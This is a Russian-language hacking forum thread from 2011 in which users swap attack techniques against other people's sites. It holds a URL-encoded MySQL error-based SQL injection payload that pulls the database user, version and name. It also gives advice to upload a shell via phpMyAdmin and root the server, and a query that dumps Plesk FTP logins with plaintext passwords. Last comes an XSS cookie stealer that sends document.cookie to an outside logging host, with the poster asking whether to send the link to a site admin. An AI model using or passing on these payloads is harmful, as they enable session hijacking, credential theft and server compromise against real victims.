HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #17461  
Старый 29.06.2011, 20:19
Sc0rpi0n
Новичок
Регистрация: 23.02.2010
Сообщений: 3
Провел на форуме:
46117

Репутация: 76
Отправить сообщение для Sc0rpi0n с помощью ICQ
По умолчанию

Подскажите плиз статью на вывод данный из mysql слепой инъекции через ошибку.

там чёто типа floor rand. токо не могу найти мануал...
 
Ответить с цитированием

  #17462  
Старый 29.06.2011, 20:47
lukmus
Постоянный
Регистрация: 18.11.2009
Сообщений: 709
Провел на форуме:
1410429

Репутация: 214


По умолчанию

Цитата:
Сообщение от Sc0rpi0n  
Sc0rpi0n said:
Подскажите плиз статью на вывод данный из mysql слепой инъекции через ошибку.
там чёто типа floor rand. токо не могу найти мануал...
https://rdot.org/forum/showpost.php?p=746&postcount=3
 
Ответить с цитированием

  #17463  
Старый 29.06.2011, 20:56
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

Цитата:
Сообщение от Sc0rpi0n  
Sc0rpi0n said:
Подскажите плиз статью на вывод данный из mysql слепой инъекции через ошибку.
там чёто типа floor rand. токо не могу найти мануал...
вот тебе пример запроса:

Цитата:
Сообщение от None  
+OR+%28SELECT+COUNT%28*%29+FROM+%28SELECT+1+UNION+ SELECT+2+UNION+SELECT+3%29x+GROUP+BY+CONCAT%28MID% 28%28select+{твой запрос}%29%29,1,63%29,+FLOOR%28RAND%280%29*2 %29%29%29--+
Цитата:
Сообщение от None  
+OR+%28SELECT+COUNT%28*%29+FROM+%28SELECT+1+UNION+ SELECT+2+UNION+SELECT+3%29x+GROUP+BY+CONCAT%28MID% 28%28select+concat_ws%280x3a,user%28%29,version%28 %29,database%28%29%29%29,1,63%29,+FLOOR%28RAND%280 %29*2%29%29%29--+
 
Ответить с цитированием

  #17464  
Старый 01.07.2011, 01:31
t0wer
Новичок
Регистрация: 07.02.2008
Сообщений: 13
Провел на форуме:
23254

Репутация: 5
По умолчанию

Есть доступ к phpmyadmin. Нужно выудить ftp логин/пароль

Направте в нужном направлении информацией или чем капнуть туда?!
 
Ответить с цитированием

  #17465  
Старый 01.07.2011, 01:46
d1v
Новичок
Регистрация: 21.02.2009
Сообщений: 3
Провел на форуме:
58401

Репутация: 0
По умолчанию

Цитата:
Сообщение от t0wer  
t0wer said:
Есть доступ к phpmyadmin. Нужно выудить ftp логин/пароль
Направте в нужном направлении информацией или чем капнуть туда?!
pma - это скрипт для управления базами данных и никакого отношения к фтп не имеет. единственный вариант, который возможен - это залить шелл через pma, порутать сервак и выудить фтп акк)

клац

есть ещё вариант найти акк в конфигах сайта. на чём он стоит?
 
Ответить с цитированием

  #17466  
Старый 01.07.2011, 02:03
Expl0ited
Guest
Сообщений: n/a
Провел на форуме:
262707

Репутация: 935
По умолчанию

Цитата:
Сообщение от t0wer  
t0wer said:
Есть доступ к phpmyadmin. Нужно выудить ftp логин/пароль
Направте в нужном направлении информацией или чем капнуть туда?!
Нужно зать что за ПО там стоит, и где хранятся пароли, бывает случаи (например Plesk Panell) где данные хранятся в базе, более того, в не зашифрованном виде, и для того что бы получить полный список всех фтп, достаточно выполнить:

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]SELECT REPLACE[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]sys_users[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]home[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'/home/httpd/vhosts/'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]) AS[/COLOR][COLOR="#0000BB"]domain[/COLOR][COLOR="#007700"],

[/
COLOR][COLOR="#0000BB"]sys_users[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]login[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]accounts[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]password FROM sys_users

LEFT JOIN accounts on sys_users
[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]account_id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]accounts[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]id

ORDER BY sys_users
[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]home ASC[/COLOR][/COLOR
Но в большинстве случаев, конечно же пароли так просто не достать, так что как минимум нужно закрепится, и начать исследовать систему изнутри.
 
Ответить с цитированием

  #17467  
Старый 01.07.2011, 17:20
killerben
Новичок
Регистрация: 16.09.2007
Сообщений: 1
Провел на форуме:
446

Репутация: 0
По умолчанию

почему когда я ввожу

Цитата:
Сообщение от None  
http://www.jertva.ru/search?q=
То в ифрейме выводит содержимое .js файла ?
 
Ответить с цитированием

  #17468  
Старый 01.07.2011, 17:29
+toxa+
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379

Репутация: 3812


Отправить сообщение для +toxa+ с помощью ICQ Отправить сообщение для +toxa+ с помощью AIM
По умолчанию

эээээ.... а что должно быть там? если хочешь выполнения js кода, то юзай вместо
__________________
 
Ответить с цитированием

  #17469  
Старый 01.07.2011, 17:41
killerben
Новичок
Регистрация: 16.09.2007
Сообщений: 1
Провел на форуме:
446

Репутация: 0
По умолчанию

Цитата:
Сообщение от +toxa+  
+toxa+ said:
эээээ.... а что должно быть там? если хочешь выполнения js кода, то юзай вместо
Спасибо большое, там работает только iframe.

Получилось так:

Содержимое xss.php

Код:
Code:

img = new Image();
img.src = "http://httpz.ru/nlj6byr15oq.gif?"+document.cookie;
Теперь когда захожу по адресу, присылает:

Код:
Code:
IP: **.***.22.87
Query: empty
REFERER: http://site.ru/xss.php
AGENT: Mozilla/5.0 (Windows NT 5.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
это значит работает ? Можно админу отправлять на почту ссылку ? если бы были кукисы, оно бы мне прислало их ?
 
Ответить с цитированием

  #17470  
Старый 01.07.2011, 17:53
+toxa+
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379

Репутация: 3812


Отправить сообщение для +toxa+ с помощью ICQ Отправить сообщение для +toxa+ с помощью AIM
По умолчанию

зайди на site.ru , потом в адресной строке напиши

Код:
Code:
javascript:document.cookie='test_cookie=31337';
и попробуй заюзать свою xss ещё раз. узнаешь наверняка.
__________________
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ